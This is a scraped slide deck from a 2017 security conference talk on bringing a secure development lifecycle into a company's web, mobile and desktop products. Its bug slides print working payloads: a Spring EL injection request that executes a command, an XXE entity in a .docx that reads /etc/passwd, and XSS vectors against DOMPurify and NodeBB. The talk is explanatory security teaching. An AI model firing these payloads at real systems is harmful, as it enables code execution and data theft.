SlideShare a Scribd company logo
Внедрение SDLC в
боевых условиях
Карбутов Егор
05.06.2017 ‹#›
$ Whoami
• Penetration tester @ Digital Security
• Bug Hunter
Внедрение SDLC в боевых условиях 2
Cure53
05.06.2017
Agenda
• Work Organization
• Types of Penetration Testing
• SDLC?
• +/-
• Product Components
• Team
• PLAN-PLAN
• Bugs and Practice
• Tools
• Some security bugs
• Success BugBounty Stories
• Conclusion
Внедрение SDLC в боевых условиях
305.06.2017
Внедрение SDLC в боевых условиях 4
Work Organization
05.06.2017
Types of Penetration Testing
Внедрение SDLC в боевых условиях
5
One Iteration
05.06.2017
Types of Penetration Testing
Внедрение SDLC в боевых условиях
6
One Iteration
N Iteration
Per Year
05.06.2017
Types of Penetration Testing
Внедрение SDLC в боевых условиях
7
One Iteration
N Iteration
Per Year
Outsource
BugBounty
05.06.2017
Types of Penetration Testing
Внедрение SDLC в боевых условиях
8
Full Time
Penetration
Testing
One Iteration
N Iteration
Per Year
Outsource
BugBounty
05.06.2017
SDLC/SSDL
• The systems development life
cycle (SDLC)/Secure software
development lifecycle (SSDL)
• Who Uses
• MS
• CISCO
Внедрение SDLC в боевых условиях
9
MS Process Guidance:
https://msdn.microsoft.com/ru-ru/library/windows/desktop/84aed186-1d75-4366-8e61-8d258746bopq.aspx
05.06.2017
Classic Types of Penetration Testing
• So much report
• Low awareness about services
• Lack of communication with developers
• Rotation of auditors
• Full Black box OR Grey box
Внедрение SDLC в боевых условиях
1005.06.2017
Внедрение SDLC в боевых условиях
11
What do you know about us?
05.06.2017
Components
• Web
• Services: Mail, Calendar, Contacts, Disk, Documents,
Admin Console, Logos (messenger)
• Mobile App
• App: Documents, Mail, Messenger
• Platforms: iOS, Android, Tizen
• Desktop App
• App: Document, Mail, Messenger
• Platforms: Linux, OS X, Windows
• Server API
• Internal services (Redis, Swift e.t.c)
Внедрение SDLC в боевых условиях
1205.06.2017
Team
Внедрение SDLC в боевых условиях
13
• Three people at full time
05.06.2017
PLAN-PLAN
• One Slot = One Week
• One Month = Four Slot
• One Sprint = Three Month
• One Year = Four Sprints
• One Year = Four Releases
Внедрение SDLC в боевых условиях
1405.06.2017
PLAN-PLAN
• 1 – Web App (Mail, Contacts, Calendar)
• 2 – Web App (Mail, Contacts, Calendar)
• 3 – Mobile App for Android, iOS, Tizen
• 4 – Mobile App for Android, iOS, Tizen
• 5 – Auth SSO Server; Web App Back-end
• 6 – File Server Back-end, Admin Web App + API
• 7 – Web App Documents Editor + Back-end Documents Editor
• 8 – Desktop App Files
• 9 – Desktop App Mail, Contacts, Calendar, Documents
• 10 – Messengers for Web, MacOS, Win, Linux + API
• 11 – Misc
• 12 – Misc
• 13 – Misc
Внедрение SDLC в боевых условиях
1505.06.2017
Say report again!
Внедрение SDLC в боевых условиях
1605.06.2017
Внедрение SDLC в боевых условиях
17
Our reporting
05.06.2017
Внедрение SDLC в боевых условиях 18
Bugs and Practice
05.06.2017
Tools: Burp
• Burp
• Web Proxy
• Scanner
• Repeater
• Intruder
• Spider
• .............
Внедрение SDLC в боевых условиях
1905.06.2017
Tools: MobSF
• Static & Dynamic Analysis
Внедрение SDLC в боевых условиях
2005.06.2017
Tools: Tizen IDE
• No one knows about the safety of this (Almost)
• Use Tizen IDE
Внедрение SDLC в боевых условиях
2105.06.2017
Remote Code Execution – EL Injection
• Expression Language (EL) Injection happens when attacker
controlled data enters an EL interpreter.
• Risk: RCE
• ${5*5} = 25
• ?vulnerable=T(java.lang.Runtime).getRuntime().exec(“cmd.exe”)
• Spring Framework < 3.0.6
Внедрение SDLC в боевых условиях
2205.06.2017
Remote Code Execution – EL Injection
• GET /api/?X-Atmosphere-tracking-
id=${shell=T(org.apache.commons.io.IOUtils).toString(0x7b)+T(org.apache.commons.i
o.IOUtils).toString(0x70)+T(org.apache.commons.io.IOUtils).toString(0x69)+T(org.apac
he.commons.io.IOUtils).toString(0x6e)+T(org.apache.commons.io.IOUtils).toString(0x6
7)+T(org.apache.commons.io.IOUtils).toString(0x64)+T(org.apache.commons.io.IOUtils
).toString(0x2d)+T(org.apache.commons.io.IOUtils).toString(0x63)+T(org.apache.com
mons.io.IOUtils).toString(0x543)+T(org.apache.commons.io.IOUtils).toString(0x33)+T(o
rg.apache.commons.io.IOUtils).toString(0x2c)+T(org.apache.commons.io.IOUtils).toStri
ng(0x37)+T(org.apache.commons.io.IOUtils).toString(0x52)+T(org.apache.commons.io.
IOUtils).toString(0x54)+T(org.apache.commons.io.IOUtils).toString(0x12)+T(org.apache
.commons.io.IOUtils).toString(0x34)+T(org.apache.commons.io.IOUtils).toString(0x36)
+T(org.apache.commons.io.IOUtils).toString(0x21)+T(org.apache.commons.io.IOUtils).t
oString(0x32)+T(org.apache.commons.io.IOUtils).toString(0x42)+T(org.apache.commo
ns.io.IOUtils).toString(0x23)+T(org.apache.commons.io.IOUtils).toString(0x31)+T(org.a
pache.commons.io.IOUtils).toString(0x22)+T(org.apache.commons.io.IOUtils).toString(
0x64)+T(org.apache.commons.io.IOUtils).toString(0x12)}--whatisSHELL${shell}---
${T(java.lang.Runtime).getRuntime().exec(shell)}
Внедрение SDLC в боевых условиях
2305.06.2017
Remote Code Execution – EL Injection PayPal
Внедрение SDLC в боевых условиях
24
http://www.piyushmalik.com/2014/03/el-injection-in-paypal-and-dollars-in.html
05.06.2017
Remote Code Execution – EL Injection PayPal
Внедрение SDLC в боевых условиях
25
http://www.piyushmalik.com/2014/03/el-injection-in-paypal-and-dollars-in.html
05.06.2017
XML External Entity
Внедрение SDLC в боевых условиях
26
• An XML External Entity attack is a type of attack against an application
that parses XML input. This attack occurs when XML input containing a
reference to an external entity is processed by a weakly configured XML
parser.
• Risk:
• DOS
• SSRF
• Port Scaning
• Reading files
05.06.2017
XML External Entity
Внедрение SDLC в боевых условиях
27
• Creating .docx document (docx = zip)
• Unzip document
• Added to one of the xml:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
…
<foo>&xxe;</foo>
• Zip document
• Upload to server
05.06.2017
XML External Entity
Внедрение SDLC в боевых условиях
2805.06.2017
XML External Entity Tool: OXML_XXE
Внедрение SDLC в боевых условиях
29
• This tool is meant to help test XXE vulnerabilities in OXML document file
formats. Currently supported:
• DOCX/XLSX/PPTX
• ODT/ODG/ODP/ODS
• SVG
• XML
• PDF
• JPG
• GIF
https://github.com/BuffaloWill/oxml_xxe
05.06.2017
XML External Entity - Yandex
Внедрение SDLC в боевых условиях
30
@vah_13
05.06.2017
Success BugBounty Stories
• DOMPurify is a DOM-only, super-fast, uber-tolerant XSS
sanitizer for HTML, MathML and SVG. It's written in
JavaScript and works in all modern browsers:
• Safari
• Opera (15+)
• Internet Explorer (10+)
• Firefox
• Chrome
• Anything else using Blink or WebKit
• Developers and Contributors:
• @0x6D6172696F
• @filedescriptor
• @shafigullin
Внедрение SDLC в боевых условиях
31
Cure53
05.06.2017
Success BugBounty Stories
• Classic Vector Make Money only for Safari:
• <svg onload=alert(document.domain)>
Внедрение SDLC в боевых условиях
32
Cure53
05.06.2017
Success BugBounty Stories
Внедрение SDLC в боевых условиях 33
Cure53
05.06.2017
Success BugBounty Stories
Внедрение SDLC в боевых условиях 34
Cure53
05.06.2017
Success BugBounty Stories
• DOMPurify XSS for Safari ---> Safari document.implementation problem
• Incorrect SVG tag handling + Processing pages using vuln functions
Внедрение SDLC в боевых условиях
35
Cure53
05.06.2017
Success BugBounty Stories
• NodeBB XSS
• Exact steps to cause this issue
• Change user email to 2@ya.ru"><svg/onload=alert(1)>
(http://192.168.189.133:4567/user/:userslug/edit/email)
• Admin go to http://192.168.189.133:4567/admin/manage/users/search
• Search users by username or email
• Javascript executed
Внедрение SDLC в боевых условиях
3605.06.2017
Success BugBounty Stories
Внедрение SDLC в боевых условиях
3705.06.2017
Success BugBounty Stories
• NodeBB security issue
Внедрение SDLC в боевых условиях
38
@andrewaeva
05.06.2017
Conclusion
• Auditors have a lot of information about the process of developing internal
services
• Access to the source code
• The opportunity to participate in the construction of an architecture
• Shifting work from the black box to the white box
• Problem with reporting
• Competent allocation of auditors' resources
• Increase the level of an expertise due to a large number of different
services
• Research of third-party products (bugbounty, public regards)
• A more detailed research of the system - search for more complex
vulnerabilities
Внедрение SDLC в боевых условиях
3905.06.2017
Links
• MS Process Guidance:
https://msdn.microsoft.com/ru-ru/library/windows/desktop/84aed186-1d75-
4366-8e61-8d258746bopq.aspx
• Burp – https://portswigger.net/burp/
• MobSF – https://github.com/MobSF/Mobile-Security-Framework-MobSF
• OXML_XXE – https://github.com/BuffaloWill/oxml_xxe
• DOMPurify – https://github.com/cure53/DOMPurify
• NodeBB – https://github.com/NodeBB/NodeBB
• PayPal EL Injection – http://www.piyushmalik.com/2014/03/el-injection-in-
paypal-and-dollars-in.html
Внедрение SDLC в боевых условиях
4005.06.2017
Any questions?
Thanks!
Внедрение SDLC в боевых условиях
41
@ShikariSenpai
05.06.2017

More Related Content

What's hot

Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Kaspersky
 
Эксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPЭксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAP
Positive Hack Days
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
Santiago Bassett
 
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Ivan Piskunov
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
 
[UniteKorea2013] Protecting your Android content
[UniteKorea2013] Protecting your Android content[UniteKorea2013] Protecting your Android content
[UniteKorea2013] Protecting your Android content
William Hugo Yang
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
Mark Ginnebaugh
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
jaxconf
 
Securing Hadoop with OSSEC
Securing Hadoop with OSSECSecuring Hadoop with OSSEC
Securing Hadoop with OSSEC
Vic Hargrave
 
Do WAFs dream of static analyzers
Do WAFs dream of static analyzersDo WAFs dream of static analyzers
Do WAFs dream of static analyzers
Vladimir Kochetkov
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
Fedir RYKHTIK
 
Daniel Kachakil - Android's Download Provider: Discovering and exploiting thr...
Daniel Kachakil - Android's Download Provider: Discovering and exploiting thr...Daniel Kachakil - Android's Download Provider: Discovering and exploiting thr...
Daniel Kachakil - Android's Download Provider: Discovering and exploiting thr...
RootedCON
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
 
Exploring, understanding and monitoring macOS activity with osquery
Exploring, understanding and monitoring macOS activity with osqueryExploring, understanding and monitoring macOS activity with osquery
Exploring, understanding and monitoring macOS activity with osquery
Zachary Wasserman
 
Hollywood mode off: security testing at scale
Hollywood mode off: security testing at scaleHollywood mode off: security testing at scale
Hollywood mode off: security testing at scale
Claudio Criscione
 
Powershell'in Karanlık Yüzü
Powershell'in Karanlık YüzüPowershell'in Karanlık Yüzü
Powershell'in Karanlık Yüzü
Halil Dalabasmaz
 
Vulpes tribes backend
Vulpes tribes backendVulpes tribes backend
Vulpes tribes backend
Jiří Soušek
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 
Data Encryption at Rest
Data Encryption at RestData Encryption at Rest
Data Encryption at Rest
All Things Open
 

What's hot (20)

Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from Kaspersky
 
Эксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPЭксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAP
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
 
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
 
[UniteKorea2013] Protecting your Android content
[UniteKorea2013] Protecting your Android content[UniteKorea2013] Protecting your Android content
[UniteKorea2013] Protecting your Android content
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
 
Securing Hadoop with OSSEC
Securing Hadoop with OSSECSecuring Hadoop with OSSEC
Securing Hadoop with OSSEC
 
Do WAFs dream of static analyzers
Do WAFs dream of static analyzersDo WAFs dream of static analyzers
Do WAFs dream of static analyzers
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 
Daniel Kachakil - Android's Download Provider: Discovering and exploiting thr...
Daniel Kachakil - Android's Download Provider: Discovering and exploiting thr...Daniel Kachakil - Android's Download Provider: Discovering and exploiting thr...
Daniel Kachakil - Android's Download Provider: Discovering and exploiting thr...
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Exploring, understanding and monitoring macOS activity with osquery
Exploring, understanding and monitoring macOS activity with osqueryExploring, understanding and monitoring macOS activity with osquery
Exploring, understanding and monitoring macOS activity with osquery
 
Hollywood mode off: security testing at scale
Hollywood mode off: security testing at scaleHollywood mode off: security testing at scale
Hollywood mode off: security testing at scale
 
Powershell'in Karanlık Yüzü
Powershell'in Karanlık YüzüPowershell'in Karanlık Yüzü
Powershell'in Karanlık Yüzü
 
Vulpes tribes backend
Vulpes tribes backendVulpes tribes backend
Vulpes tribes backend
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
 
Data Encryption at Rest
Data Encryption at RestData Encryption at Rest
Data Encryption at Rest
 

Similar to Внедрение SDLC в боевых условиях / Егор Карбутов (Digital Security)

Apache Spark v3.0.0
Apache Spark v3.0.0Apache Spark v3.0.0
Apache Spark v3.0.0
Jean-Georges Perrin
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
Lewis Ardern
 
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
Demi Ben-Ari
 
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Milan 2017 - D...
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Milan 2017 - D...Monitoring Big Data Systems Done "The Simple Way" - Codemotion Milan 2017 - D...
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Milan 2017 - D...
Demi Ben-Ari
 
Demi Ben-Ari - Monitoring Big Data Systems Done "The Simple Way" - Codemotion...
Demi Ben-Ari - Monitoring Big Data Systems Done "The Simple Way" - Codemotion...Demi Ben-Ari - Monitoring Big Data Systems Done "The Simple Way" - Codemotion...
Demi Ben-Ari - Monitoring Big Data Systems Done "The Simple Way" - Codemotion...
Codemotion
 
MongoDB in the Middle of a Hybrid Cloud and Polyglot Persistence Architecture
MongoDB in the Middle of a Hybrid Cloud and Polyglot Persistence ArchitectureMongoDB in the Middle of a Hybrid Cloud and Polyglot Persistence Architecture
MongoDB in the Middle of a Hybrid Cloud and Polyglot Persistence Architecture
MongoDB
 
GIB2021 - Dan Probert - BizTalk Migrator Deep Dive
GIB2021 - Dan Probert - BizTalk Migrator Deep DiveGIB2021 - Dan Probert - BizTalk Migrator Deep Dive
GIB2021 - Dan Probert - BizTalk Migrator Deep Dive
probertdaniel
 
FluentMigrator - Dayton .NET - July 2023
FluentMigrator - Dayton .NET - July 2023FluentMigrator - Dayton .NET - July 2023
FluentMigrator - Dayton .NET - July 2023
Matthew Groves
 
State of GeoServer 2015
State of GeoServer 2015State of GeoServer 2015
State of GeoServer 2015
Jody Garnett
 
BDW Chicago 2016 - Jim Scott, Director, Enterprise Strategy & Architecture - ...
BDW Chicago 2016 - Jim Scott, Director, Enterprise Strategy & Architecture - ...BDW Chicago 2016 - Jim Scott, Director, Enterprise Strategy & Architecture - ...
BDW Chicago 2016 - Jim Scott, Director, Enterprise Strategy & Architecture - ...
Big Data Week
 
Automated release management - DevConFu 2014
Automated release management - DevConFu 2014Automated release management - DevConFu 2014
Automated release management - DevConFu 2014
Kristoffer Deinoff
 
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing ItYou Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
Aleksandr Yampolskiy
 
Continuous delivery w projekcie open source - Marcin Stachniuk
Continuous delivery w projekcie open source - Marcin StachniukContinuous delivery w projekcie open source - Marcin Stachniuk
Continuous delivery w projekcie open source - Marcin Stachniuk
MarcinStachniuk
 
Drilling Cyber Security Data With Apache Drill
Drilling Cyber Security Data With Apache DrillDrilling Cyber Security Data With Apache Drill
Drilling Cyber Security Data With Apache Drill
Charles Givre
 
Web Development using Ruby on Rails
Web Development using Ruby on RailsWeb Development using Ruby on Rails
Web Development using Ruby on Rails
Avi Kedar
 
Serverless in production, an experience report (FullStack 2018)
Serverless in production, an experience report (FullStack 2018)Serverless in production, an experience report (FullStack 2018)
Serverless in production, an experience report (FullStack 2018)
Yan Cui
 
Cvcc performance tuning
Cvcc performance tuningCvcc performance tuning
Cvcc performance tuning
John McCaffrey
 
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
Codemotion
 
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
Demi Ben-Ari
 
ACM BPM and elasticsearch AMIS25
ACM BPM and elasticsearch AMIS25ACM BPM and elasticsearch AMIS25

Similar to Внедрение SDLC в боевых условиях / Егор Карбутов (Digital Security) (20)

Apache Spark v3.0.0
Apache Spark v3.0.0Apache Spark v3.0.0
Apache Spark v3.0.0
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
 
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
 
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Milan 2017 - D...
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Milan 2017 - D...Monitoring Big Data Systems Done "The Simple Way" - Codemotion Milan 2017 - D...
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Milan 2017 - D...
 
Demi Ben-Ari - Monitoring Big Data Systems Done "The Simple Way" - Codemotion...
Demi Ben-Ari - Monitoring Big Data Systems Done "The Simple Way" - Codemotion...Demi Ben-Ari - Monitoring Big Data Systems Done "The Simple Way" - Codemotion...
Demi Ben-Ari - Monitoring Big Data Systems Done "The Simple Way" - Codemotion...
 
MongoDB in the Middle of a Hybrid Cloud and Polyglot Persistence Architecture
MongoDB in the Middle of a Hybrid Cloud and Polyglot Persistence ArchitectureMongoDB in the Middle of a Hybrid Cloud and Polyglot Persistence Architecture
MongoDB in the Middle of a Hybrid Cloud and Polyglot Persistence Architecture
 
GIB2021 - Dan Probert - BizTalk Migrator Deep Dive
GIB2021 - Dan Probert - BizTalk Migrator Deep DiveGIB2021 - Dan Probert - BizTalk Migrator Deep Dive
GIB2021 - Dan Probert - BizTalk Migrator Deep Dive
 
FluentMigrator - Dayton .NET - July 2023
FluentMigrator - Dayton .NET - July 2023FluentMigrator - Dayton .NET - July 2023
FluentMigrator - Dayton .NET - July 2023
 
State of GeoServer 2015
State of GeoServer 2015State of GeoServer 2015
State of GeoServer 2015
 
BDW Chicago 2016 - Jim Scott, Director, Enterprise Strategy & Architecture - ...
BDW Chicago 2016 - Jim Scott, Director, Enterprise Strategy & Architecture - ...BDW Chicago 2016 - Jim Scott, Director, Enterprise Strategy & Architecture - ...
BDW Chicago 2016 - Jim Scott, Director, Enterprise Strategy & Architecture - ...
 
Automated release management - DevConFu 2014
Automated release management - DevConFu 2014Automated release management - DevConFu 2014
Automated release management - DevConFu 2014
 
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing ItYou Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
 
Continuous delivery w projekcie open source - Marcin Stachniuk
Continuous delivery w projekcie open source - Marcin StachniukContinuous delivery w projekcie open source - Marcin Stachniuk
Continuous delivery w projekcie open source - Marcin Stachniuk
 
Drilling Cyber Security Data With Apache Drill
Drilling Cyber Security Data With Apache DrillDrilling Cyber Security Data With Apache Drill
Drilling Cyber Security Data With Apache Drill
 
Web Development using Ruby on Rails
Web Development using Ruby on RailsWeb Development using Ruby on Rails
Web Development using Ruby on Rails
 
Serverless in production, an experience report (FullStack 2018)
Serverless in production, an experience report (FullStack 2018)Serverless in production, an experience report (FullStack 2018)
Serverless in production, an experience report (FullStack 2018)
 
Cvcc performance tuning
Cvcc performance tuningCvcc performance tuning
Cvcc performance tuning
 
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
 
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
 
ACM BPM and elasticsearch AMIS25
ACM BPM and elasticsearch AMIS25ACM BPM and elasticsearch AMIS25
ACM BPM and elasticsearch AMIS25
 

More from Ontico

One-cloud — система управления дата-центром в Одноклассниках / Олег Анастасье...
One-cloud — система управления дата-центром в Одноклассниках / Олег Анастасье...One-cloud — система управления дата-центром в Одноклассниках / Олег Анастасье...
One-cloud — система управления дата-центром в Одноклассниках / Олег Анастасье...
Ontico
 
Масштабируя DNS / Артем Гавриченков (Qrator Labs)
Масштабируя DNS / Артем Гавриченков (Qrator Labs)Масштабируя DNS / Артем Гавриченков (Qrator Labs)
Масштабируя DNS / Артем Гавриченков (Qrator Labs)
Ontico
 
Создание BigData-платформы для ФГУП Почта России / Андрей Бащенко (Luxoft)
Создание BigData-платформы для ФГУП Почта России / Андрей Бащенко (Luxoft)Создание BigData-платформы для ФГУП Почта России / Андрей Бащенко (Luxoft)
Создание BigData-платформы для ФГУП Почта России / Андрей Бащенко (Luxoft)
Ontico
 
Готовим тестовое окружение, или сколько тестовых инстансов вам нужно / Алекса...
Готовим тестовое окружение, или сколько тестовых инстансов вам нужно / Алекса...Готовим тестовое окружение, или сколько тестовых инстансов вам нужно / Алекса...
Готовим тестовое окружение, или сколько тестовых инстансов вам нужно / Алекса...
Ontico
 
Новые технологии репликации данных в PostgreSQL / Александр Алексеев (Postgre...
Новые технологии репликации данных в PostgreSQL / Александр Алексеев (Postgre...Новые технологии репликации данных в PostgreSQL / Александр Алексеев (Postgre...
Новые технологии репликации данных в PostgreSQL / Александр Алексеев (Postgre...
Ontico
 
PostgreSQL Configuration for Humans / Alvaro Hernandez (OnGres)
PostgreSQL Configuration for Humans / Alvaro Hernandez (OnGres)PostgreSQL Configuration for Humans / Alvaro Hernandez (OnGres)
PostgreSQL Configuration for Humans / Alvaro Hernandez (OnGres)
Ontico
 
Inexpensive Datamasking for MySQL with ProxySQL — Data Anonymization for Deve...
Inexpensive Datamasking for MySQL with ProxySQL — Data Anonymization for Deve...Inexpensive Datamasking for MySQL with ProxySQL — Data Anonymization for Deve...
Inexpensive Datamasking for MySQL with ProxySQL — Data Anonymization for Deve...
Ontico
 
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...
Ontico
 
ProxySQL Use Case Scenarios / Alkin Tezuysal (Percona)
ProxySQL Use Case Scenarios / Alkin Tezuysal (Percona)ProxySQL Use Case Scenarios / Alkin Tezuysal (Percona)
ProxySQL Use Case Scenarios / Alkin Tezuysal (Percona)
Ontico
 
MySQL Replication — Advanced Features / Петр Зайцев (Percona)
MySQL Replication — Advanced Features / Петр Зайцев (Percona)MySQL Replication — Advanced Features / Петр Зайцев (Percona)
MySQL Replication — Advanced Features / Петр Зайцев (Percona)
Ontico
 
Внутренний open-source. Как разрабатывать мобильное приложение большим количе...
Внутренний open-source. Как разрабатывать мобильное приложение большим количе...Внутренний open-source. Как разрабатывать мобильное приложение большим количе...
Внутренний open-source. Как разрабатывать мобильное приложение большим количе...
Ontico
 
Подробно о том, как Causal Consistency реализовано в MongoDB / Михаил Тюленев...
Подробно о том, как Causal Consistency реализовано в MongoDB / Михаил Тюленев...Подробно о том, как Causal Consistency реализовано в MongoDB / Михаил Тюленев...
Подробно о том, как Causal Consistency реализовано в MongoDB / Михаил Тюленев...
Ontico
 
Балансировка на скорости проводов. Без ASIC, без ограничений. Решения NFWare ...
Балансировка на скорости проводов. Без ASIC, без ограничений. Решения NFWare ...Балансировка на скорости проводов. Без ASIC, без ограничений. Решения NFWare ...
Балансировка на скорости проводов. Без ASIC, без ограничений. Решения NFWare ...
Ontico
 
Перехват трафика — мифы и реальность / Евгений Усков (Qrator Labs)
